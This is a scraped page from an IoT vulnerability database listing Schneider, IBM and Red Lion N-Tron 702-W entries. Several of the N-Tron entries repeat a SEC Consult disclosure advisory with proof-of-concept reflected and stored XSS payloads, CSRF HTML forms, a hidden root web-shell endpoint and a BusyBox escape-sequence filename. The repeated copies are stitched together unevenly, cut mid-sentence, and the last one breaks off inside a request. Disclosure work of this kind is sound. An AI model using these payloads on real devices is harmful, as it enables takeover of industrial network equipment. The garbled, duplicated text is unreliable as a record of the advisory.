VARIoT IoT vulnerabilities database

VAR-202008-1282 | No CVE | Schneider Electric Modicon M580 has an information disclosure vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Modicon M580 is a programmable logic controller introduced by Schneider Electric.
Schneider Electric Modicon M580 has an information disclosure vulnerability. Attackers can use the vulnerability to obtain arbitrary memory data.
VAR-202008-0172 | CVE-2019-4533 | IBM Resilient Vulnerability regarding input verification in |
CVSS V2: 4.0 CVSS V3: 4.3 Severity: MEDIUM |
IBM Resilient SOAR V38.0 users may experience a denial of service of the SOAR Platform due to a insufficient input validation. IBM X-Force ID: 165589. IBM Resilient There is an input verification vulnerability in. Vendor exploits this vulnerability IBM X-Force ID: 165589 It is published as.Service operation interruption (DoS) It may be put into a state
VAR-202009-0592 | CVE-2020-16206 | N-Tron 702-W and 702M12-W Cross-site scripting vulnerability in |
CVSS V2: 3.5 CVSS V3: 9.0 Severity: CRITICAL |
The affected product is vulnerable to stored cross-site scripting, which may allow an attacker to remotely execute arbitrary code to gain access to sensitive data on the N-Tron 702-W / 702M12-W (all versions). N-Tron 702-W and 702M12-W Exists in a cross-site scripting vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Red Lion N-Tron 702-W/702M12-W is a high-voltage Ethernet switch product.
Red Lion N-Tron 702-W/702M12-W has a cross-site scripting vulnerability. SEC Consult Vulnerability Lab Security Advisory < 20200902-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W
vulnerable version: <=2.0.26
fixed version:
CVE number: CVE-2020-16210, CVE-2020-16206, CVE-2020-16208,
CVE-2020-16204
impact: High
homepage: https://www.redlion.net/
found: 2020-02-28
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"For over forty years, customers around the world have trusted Red Lion
Controls. Our award-winning industrial automation and
networking solutions provide critical information and controls to
improve productivity, working with numerous devices and diverse
protocols to access data."
Source: https://www.redlion.net
Business recommendation:
------------------------
The vendor recommends to change the hardware and use a newer product.
SEC Consult recommends to remove the device from productive environments. An attacker is also able to perform actions in the
context of the attacked user.
Such placed payloads cannot be detected via browser-protection mechanisms as
they are embedded into the web-interface.
An attacker is also able to perform actions in the context of the attacked user.
3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208
CSRF protection is not implemented at all.
Such a vulnerability enables an attacker to modify different configurations of
a device by luring an authenticated user to click on a crafted link. An
attacker is able to take over the device by exploiting this vulnerability.
4) Hidden OS Web-Shell Interface - CVE-2020-16204
An undocumented interface, that contains a web-shell to the underlying OS, was
found to be present on the device. It is not referenced in the actual menu
and is also not mentioned in the manual of the device.
Commands can be executed as root on the device.
This endpoint seems to be a leftover of the used Atheros SDK.
5) Known BusyBox Vulnerabilities
The used BusyBox toolkit in version 1.11.0 is outdated and contains multiple
known vulnerabilities. The outdated version was found by IoT Inspector.
6) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during
a quick examination.
The vulnerabilities 1), 2), 3), 4) and 5) were manually verified on an emulated
device by using the MEDUSA scalable firmware runtime.
Proof of concept:
-----------------
1) Reflected Cross-Site Scripting (XSS) - CVE-2020-16210
The "pingtest_action.cgi" endpoint can be used to trigger reflected XSS.
http://$IP/pingtest_action.cgi?action=pingtest&dst_ip_addr=1&dst_addr_select=127.0.0.1&lines=%3Chtml%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3C/html%3E
2) Stored Cross-Site Scripting (XSS) - CVE-2020-16206
Injection of a XSS payload is possible on multiple endpoints. An example
for permanent XSS on the endpoint "/network.cgi" is the following request:
-------------------------------------------------------------------------------
POST /network.cgi HTTP/1.1
Host: $IP
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------195698564115308644282115103021
Content-Length: 915
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: ui_language=en_US
Upgrade-Insecure-Requests: 1
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="netmode"
bridge
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="wlanipmode"
0
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brip"
192.168.1.202
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brmask"
255.255.255.0
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brgw"
192.168.1.1"><script>alert(document.location)</script>
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="dns1"
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="dns2"
-----------------------------195698564115308644282115103021--
-------------------------------------------------------------------------------
This can also be embedded in the HTML code as shown below:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/network.cgi" method="POST" enctype="multipart/form-data">
<input type="hidden" name="netmode" value="bridge" />
<input type="hidden" name="wlanipmode" value="0" />
<input type="hidden" name="brip" value="192.168.1.202" />
<input type="hidden" name="brmask" value="255.255.255.0" />
<input type="hidden" name="brgw" value="192.168.1.1"><script>alert(document.location+" > SEC-Consult")</script>" />
<input type="hidden" name="dns1" value="" />
<input type="hidden" name="dns2" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208
CSRF can be triggered on each endpoint as the whole web-interface does not
implement any protection mechanisms. Changing the hostname to "SEC Consult" can
be done with the following embedded HTML code:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/system.cgi" method="POST" enctype="multipart/form-data">
<input type="hidden" name="hostname" value="SEC Consult" />
<input type="hidden" name="action" value="chhost" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
4) Hidden OS Web-Shell Interface - CVE-2020-16204
The endpoint "/admin.cgi" is not referenced within the whole web-interface and
also not documented in the manual. By browsing this endpoint, multiple actions
can be natively triggered:
* Execute commands in context of the root user
* Upload files
* Download files
* Change access rights
All other actions can be done via the command execution. The lack of CSRF
protections allows attackers to execute commands on the device by luring a
user on malicious web-pages.
5) Known BusyBox Vulnerabilities
The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on
an emulated device:
A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the
vulnerability.
-------------------------------------------------------------------------------
# ls "pressing <TAB>"
test
55\;test.txt
#
-------------------------------------------------------------------------------
6) Outdated Software Components
By analyzing the firmware a lot of components are found to be outdated:
* BusyBox 1.0.1
* PHP/FI 2.0.1
* Dnsmasq 2.35
* Boa 0.93.15
Vulnerable / tested versions:
-----------------------------
the following firmware version has been tested:
* Red Lion N-Tron 702-W / 2.0.26
* Red Lion N-Tron 702M12-W / 2.0.26
Vendor contact timeline:
------------------------
2020-03-09: Contacting vendor through support.emea@redlion.net; No answer.
2020-03-17: Asked for status update; No answer.
2020-03-30: Asked for status update, added incoming.ics-cert@redlion.net to
the list of recipients; No answer.
2020-04-13: Requested support for coordination from CERT@VDE for the advisory.
Sent the advisory to the CERT.
2020-04-14: Security contact from CERT@VDE answered, that ICS-CERT was also in-
formed.
2020-07-17: Asked contact at ICS-CERT for status update; Contact stated that
they are waiting for an update of Red Lion.
2020-08-20: Received CISA draft for an advisory from CERT@VDE.
2020-08-28: Found the published advisory on CISA's website* which was released
on 2020-08-27.
2020-09-02: Release of security advisory.
* https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01
Solution:
---------
Upgrade to newer hardware.
Workaround:
-----------
None.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2020
VAR-202008-0177 | CVE-2019-4579 | IBM Resilient SOAR Vulnerability in |
CVSS V2: 4.0 CVSS V3: 4.3 Severity: MEDIUM |
IBM Resilient SOAR 38 uses incomplete blacklisting for input validation which allows attackers to bypass application controls resulting in direct impact to the system and data integrity. IBM X-Force ID: 167236. IBM Resilient SOAR There is an unspecified vulnerability in. Vendor exploits this vulnerability IBM X-Force ID: 167236 It is published as.Information may be tampered with
VAR-202009-0591 | CVE-2020-16204 | N-Tron 702-W and 702M12-W Vulnerability in private features in |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
The affected product is vulnerable due to an undocumented interface found on the device, which may allow an attacker to execute commands as root on the device on the N-Tron 702-W / 702M12-W (all versions). N-Tron 702-W and 702M12-W Includes a vulnerability in a private feature.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Red Lion N-Tron 702-W/702M12-W is a high-voltage Ethernet switch product.
Red Lion N-Tron 702-W/702M12-W has an undocumented interface vulnerability. Attackers can use this vulnerability to submit special requests and execute arbitrary commands with ROOT permissions. SEC Consult Vulnerability Lab Security Advisory < 20200902-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W
vulnerable version: <=2.0.26
fixed version:
CVE number: CVE-2020-16210, CVE-2020-16206, CVE-2020-16208,
CVE-2020-16204
impact: High
homepage: https://www.redlion.net/
found: 2020-02-28
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"For over forty years, customers around the world have trusted Red Lion
Controls. Our award-winning industrial automation and
networking solutions provide critical information and controls to
improve productivity, working with numerous devices and diverse
protocols to access data."
Source: https://www.redlion.net
Business recommendation:
------------------------
The vendor recommends to change the hardware and use a newer product.
SEC Consult recommends to remove the device from productive environments.
Vulnerability overview/description:
-----------------------------------
1) Reflected Cross-Site Scripting (XSS) - CVE-2020-16210
A reflected cross-site scripting vulnerability was identified at the endpoint
"/pingtest_action.cgi". An attacker is also able to perform actions in the
context of the attacked user.
2) Stored Cross-Site Scripting (XSS) - CVE-2020-16206
Stored cross-site scripting vulnerabilities are present on multiple endpoints.
Such placed payloads cannot be detected via browser-protection mechanisms as
they are embedded into the web-interface.
An attacker is also able to perform actions in the context of the attacked user.
3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208
CSRF protection is not implemented at all.
Such a vulnerability enables an attacker to modify different configurations of
a device by luring an authenticated user to click on a crafted link. An
attacker is able to take over the device by exploiting this vulnerability.
4) Hidden OS Web-Shell Interface - CVE-2020-16204
An undocumented interface, that contains a web-shell to the underlying OS, was
found to be present on the device. It is not referenced in the actual menu
and is also not mentioned in the manual of the device.
This endpoint seems to be a leftover of the used Atheros SDK.
5) Known BusyBox Vulnerabilities
The used BusyBox toolkit in version 1.11.0 is outdated and contains multiple
known vulnerabilities. The outdated version was found by IoT Inspector.
6) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during
a quick examination.
The vulnerabilities 1), 2), 3), 4) and 5) were manually verified on an emulated
device by using the MEDUSA scalable firmware runtime.
Proof of concept:
-----------------
1) Reflected Cross-Site Scripting (XSS) - CVE-2020-16210
The "pingtest_action.cgi" endpoint can be used to trigger reflected XSS.
http://$IP/pingtest_action.cgi?action=pingtest&dst_ip_addr=1&dst_addr_select=127.0.0.1&lines=%3Chtml%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3C/html%3E
2) Stored Cross-Site Scripting (XSS) - CVE-2020-16206
Injection of a XSS payload is possible on multiple endpoints. An example
for permanent XSS on the endpoint "/network.cgi" is the following request:
-------------------------------------------------------------------------------
POST /network.cgi HTTP/1.1
Host: $IP
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------195698564115308644282115103021
Content-Length: 915
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: ui_language=en_US
Upgrade-Insecure-Requests: 1
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="netmode"
bridge
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="wlanipmode"
0
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brip"
192.168.1.202
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brmask"
255.255.255.0
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brgw"
192.168.1.1"><script>alert(document.location)</script>
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="dns1"
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="dns2"
-----------------------------195698564115308644282115103021--
-------------------------------------------------------------------------------
This can also be embedded in the HTML code as shown below:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/network.cgi" method="POST" enctype="multipart/form-data">
<input type="hidden" name="netmode" value="bridge" />
<input type="hidden" name="wlanipmode" value="0" />
<input type="hidden" name="brip" value="192.168.1.202" />
<input type="hidden" name="brmask" value="255.255.255.0" />
<input type="hidden" name="brgw" value="192.168.1.1"><script>alert(document.location+" > SEC-Consult")</script>" />
<input type="hidden" name="dns1" value="" />
<input type="hidden" name="dns2" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208
CSRF can be triggered on each endpoint as the whole web-interface does not
implement any protection mechanisms. Changing the hostname to "SEC Consult" can
be done with the following embedded HTML code:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/system.cgi" method="POST" enctype="multipart/form-data">
<input type="hidden" name="hostname" value="SEC Consult" />
<input type="hidden" name="action" value="chhost" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
4) Hidden OS Web-Shell Interface - CVE-2020-16204
The endpoint "/admin.cgi" is not referenced within the whole web-interface and
also not documented in the manual. By browsing this endpoint, multiple actions
can be natively triggered:
* Execute commands in context of the root user
* Upload files
* Download files
* Change access rights
All other actions can be done via the command execution.
5) Known BusyBox Vulnerabilities
The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on
an emulated device:
A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the
vulnerability.
-------------------------------------------------------------------------------
# ls "pressing <TAB>"
test
55\;test.txt
#
-------------------------------------------------------------------------------
6) Outdated Software Components
By analyzing the firmware a lot of components are found to be outdated:
* BusyBox 1.0.1
* PHP/FI 2.0.1
* Dnsmasq 2.35
* Boa 0.93.15
Vulnerable / tested versions:
-----------------------------
the following firmware version has been tested:
* Red Lion N-Tron 702-W / 2.0.26
* Red Lion N-Tron 702M12-W / 2.0.26
Vendor contact timeline:
------------------------
2020-03-09: Contacting vendor through support.emea@redlion.net; No answer.
2020-03-17: Asked for status update; No answer.
2020-03-30: Asked for status update, added incoming.ics-cert@redlion.net to
the list of recipients; No answer.
2020-04-13: Requested support for coordination from CERT@VDE for the advisory.
Sent the advisory to the CERT.
2020-04-14: Security contact from CERT@VDE answered, that ICS-CERT was also in-
formed.
2020-07-17: Asked contact at ICS-CERT for status update; Contact stated that
they are waiting for an update of Red Lion.
2020-08-20: Received CISA draft for an advisory from CERT@VDE.
2020-08-28: Found the published advisory on CISA's website* which was released
on 2020-08-27.
2020-09-02: Release of security advisory.
* https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01
Solution:
---------
Upgrade to newer hardware.
Workaround:
-----------
None.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2020
VAR-202009-0601 | CVE-2020-16210 | N-Tron 702-W and 702M12-W Cross-site scripting vulnerability in |
CVSS V2: 3.5 CVSS V3: 9.0 Severity: CRITICAL |
The affected product is vulnerable to reflected cross-site scripting, which may allow an attacker to remotely execute arbitrary code and perform actions in the context of an attacked user on the N-Tron 702-W / 702M12-W (all versions). N-Tron 702-W and 702M12-W Exists in a cross-site scripting vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Red Lion N-Tron 702-W/702M12-W is a high-voltage Ethernet switch product.
Red Lion N-Tron 702-W/702M12-W has a cross-site scripting vulnerability. SEC Consult Vulnerability Lab Security Advisory < 20200902-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W
vulnerable version: <=2.0.26
fixed version:
CVE number: CVE-2020-16210, CVE-2020-16206, CVE-2020-16208,
CVE-2020-16204
impact: High
homepage: https://www.redlion.net/
found: 2020-02-28
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"For over forty years, customers around the world have trusted Red Lion
Controls. Our award-winning industrial automation and
networking solutions provide critical information and controls to
improve productivity, working with numerous devices and diverse
protocols to access data."
Source: https://www.redlion.net
Business recommendation:
------------------------
The vendor recommends to change the hardware and use a newer product.
SEC Consult recommends to remove the device from productive environments.
Such placed payloads cannot be detected via browser-protection mechanisms as
they are embedded into the web-interface.
3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208
CSRF protection is not implemented at all.
Such a vulnerability enables an attacker to modify different configurations of
a device by luring an authenticated user to click on a crafted link. An
attacker is able to take over the device by exploiting this vulnerability.
4) Hidden OS Web-Shell Interface - CVE-2020-16204
An undocumented interface, that contains a web-shell to the underlying OS, was
found to be present on the device. It is not referenced in the actual menu
and is also not mentioned in the manual of the device.
Commands can be executed as root on the device.
This endpoint seems to be a leftover of the used Atheros SDK.
5) Known BusyBox Vulnerabilities
The used BusyBox toolkit in version 1.11.0 is outdated and contains multiple
known vulnerabilities. The outdated version was found by IoT Inspector.
6) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during
a quick examination.
The vulnerabilities 1), 2), 3), 4) and 5) were manually verified on an emulated
device by using the MEDUSA scalable firmware runtime.
Proof of concept:
-----------------
1) Reflected Cross-Site Scripting (XSS) - CVE-2020-16210
The "pingtest_action.cgi" endpoint can be used to trigger reflected XSS.
http://$IP/pingtest_action.cgi?action=pingtest&dst_ip_addr=1&dst_addr_select=127.0.0.1&lines=%3Chtml%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3C/html%3E
2) Stored Cross-Site Scripting (XSS) - CVE-2020-16206
Injection of a XSS payload is possible on multiple endpoints. An example
for permanent XSS on the endpoint "/network.cgi" is the following request:
-------------------------------------------------------------------------------
POST /network.cgi HTTP/1.1
Host: $IP
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------195698564115308644282115103021
Content-Length: 915
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: ui_language=en_US
Upgrade-Insecure-Requests: 1
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="netmode"
bridge
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="wlanipmode"
0
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brip"
192.168.1.202
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brmask"
255.255.255.0
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brgw"
192.168.1.1"><script>alert(document.location)</script>
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="dns1"
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="dns2"
-----------------------------195698564115308644282115103021--
-------------------------------------------------------------------------------
This can also be embedded in the HTML code as shown below:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/network.cgi" method="POST" enctype="multipart/form-data">
<input type="hidden" name="netmode" value="bridge" />
<input type="hidden" name="wlanipmode" value="0" />
<input type="hidden" name="brip" value="192.168.1.202" />
<input type="hidden" name="brmask" value="255.255.255.0" />
<input type="hidden" name="brgw" value="192.168.1.1"><script>alert(document.location+" > SEC-Consult")</script>" />
<input type="hidden" name="dns1" value="" />
<input type="hidden" name="dns2" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
3) Cross-Site Request Forgery (CSRF) - CVE-2020-16208
CSRF can be triggered on each endpoint as the whole web-interface does not
implement any protection mechanisms. Changing the hostname to "SEC Consult" can
be done with the following embedded HTML code:
-------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://$IP/system.cgi" method="POST" enctype="multipart/form-data">
<input type="hidden" name="hostname" value="SEC Consult" />
<input type="hidden" name="action" value="chhost" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
-------------------------------------------------------------------------------
4) Hidden OS Web-Shell Interface - CVE-2020-16204
The endpoint "/admin.cgi" is not referenced within the whole web-interface and
also not documented in the manual. By browsing this endpoint, multiple actions
can be natively triggered:
* Execute commands in context of the root user
* Upload files
* Download files
* Change access rights
All other actions can be done via the command execution. The lack of CSRF
protections allows attackers to execute commands on the device by luring a
user on malicious web-pages.
5) Known BusyBox Vulnerabilities
The BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on
an emulated device:
A file with the name "\ectest\n\e]55;test.txt\a" was created to trigger the
vulnerability.
-------------------------------------------------------------------------------
# ls "pressing <TAB>"
test
55\;test.txt
#
-------------------------------------------------------------------------------
6) Outdated Software Components
By analyzing the firmware a lot of components are found to be outdated:
* BusyBox 1.0.1
* PHP/FI 2.0.1
* Dnsmasq 2.35
* Boa 0.93.15
Vulnerable / tested versions:
-----------------------------
the following firmware version has been tested:
* Red Lion N-Tron 702-W / 2.0.26
* Red Lion N-Tron 702M12-W / 2.0.26
Vendor contact timeline:
------------------------
2020-03-09: Contacting vendor through support.emea@redlion.net; No answer.
2020-03-17: Asked for status update; No answer.
2020-03-30: Asked for status update, added incoming.ics-cert@redlion.net to
the list of recipients; No answer.
2020-04-13: Requested support for coordination from CERT@VDE for the advisory.
Sent the advisory to the CERT.
2020-04-14: Security contact from CERT@VDE answered, that ICS-CERT was also in-
formed.
2020-07-17: Asked contact at ICS-CERT for status update; Contact stated that
they are waiting for an update of Red Lion.
2020-08-20: Received CISA draft for an advisory from CERT@VDE.
2020-08-28: Found the published advisory on CISA's website* which was released
on 2020-08-27.
2020-09-02: Release of security advisory.
* https://us-cert.cisa.gov/ics/advisories/icsa-20-240-01
Solution:
---------
Upgrade to newer hardware.
Workaround:
-----------
None.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF T. Weber / @2020
VAR-202009-0593 | CVE-2020-16208 | N-Tron 702-W and 702M12-W Cross-site request forgery vulnerability in |
CVSS V2: 9.3 CVSS V3: 8.8 Severity: HIGH |
The affected product is vulnerable to cross-site request forgery, which may allow an attacker to modify different configurations of a device by luring an authenticated user to click on a crafted link on the N-Tron 702-W / 702M12-W (all versions). N-Tron 702-W and 702M12-W Exists in a cross-site request forgery vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Red Lion N-Tron 702-W/702M12-W is a high-voltage Ethernet switch product.
Red Lion N-Tron 702-W/702M12-W has a cross-site request forgery vulnerability. Attackers can use this vulnerability to construct malicious URIs, trick requests, and perform malicious operations in the context of the target user. SEC Consult Vulnerability Lab Security Advisory < 20200902-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Red Lion N-Tron 702-W, Red Lion N-Tron 702M12-W
vulnerable version: <=2.0.26
fixed version:
CVE number: CVE-2020-16210, CVE-2020-16206, CVE-2020-16208,
CVE-2020-16204
impact: High
homepage: https://www.redlion.net/
found: 2020-02-28
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"For over forty years, customers around the world have trusted Red Lion
Controls. Our award-winning industrial automation and
networking solutions provide critical information and controls to
improve productivity, working with numerous devices and diverse
protocols to access data."
Source: https://www.redlion.net
Business recommendation:
------------------------
The vendor recommends to change the hardware and use a newer product.
SEC Consult recommends to remove the device from productive environments.
Vulnerability overview/description:
-----------------------------------
1) Reflected Cross-Site Scripting (XSS) - CVE-2020-16210
A reflected cross-site scripting vulnerability was identified at the endpoint
"/pingtest_action.cgi".
2) Stored Cross-Site Scripting (XSS) - CVE-2020-16206
Stored cross-site scripting vulnerabilities are present on multiple endpoints.
Such placed payloads cannot be detected via browser-protection mechanisms as
they are embedded into the web-interface. An
attacker is able to take over the device by exploiting this vulnerability.
4) Hidden OS Web-Shell Interface - CVE-2020-16204
An undocumented interface, that contains a web-shell to the underlying OS, was
found to be present on the device. It is not referenced in the actual menu
and is also not mentioned in the manual of the device.
Commands can be executed as root on the device. A remote attacker can execute
system commands via this way in combination with vulnerability #3.
This endpoint seems to be a leftover of the used Atheros SDK.
5) Known BusyBox Vulnerabilities
The used BusyBox toolkit in version 1.11.0 is outdated and contains multiple
known vulnerabilities. The outdated version was found by IoT Inspector.
6) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during
a quick examination.
The vulnerabilities 1), 2), 3), 4) and 5) were manually verified on an emulated
device by using the MEDUSA scalable firmware runtime.
Proof of concept:
-----------------
1) Reflected Cross-Site Scripting (XSS) - CVE-2020-16210
The "pingtest_action.cgi" endpoint can be used to trigger reflected XSS.
http://$IP/pingtest_action.cgi?action=pingtest&dst_ip_addr=1&dst_addr_select=127.0.0.1&lines=%3Chtml%3E%3Cscript%3Ealert(document.location)%3C/script%3E%3C/html%3E
2) Stored Cross-Site Scripting (XSS) - CVE-2020-16206
Injection of a XSS payload is possible on multiple endpoints. An example
for permanent XSS on the endpoint "/network.cgi" is the following request:
-------------------------------------------------------------------------------
POST /network.cgi HTTP/1.1
Host: $IP
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------195698564115308644282115103021
Content-Length: 915
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Cookie: ui_language=en_US
Upgrade-Insecure-Requests: 1
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="netmode"
bridge
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="wlanipmode"
0
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brip"
192.168.1.202
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brmask"
255.255.255.0
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="brgw"
192.168.1.1"><script>alert(document.location)</script>
-----------------------------195698564115308644282115103021
Content-Disposition: form-data; name="dns1"
-----------------------------195698564115308644282115103021
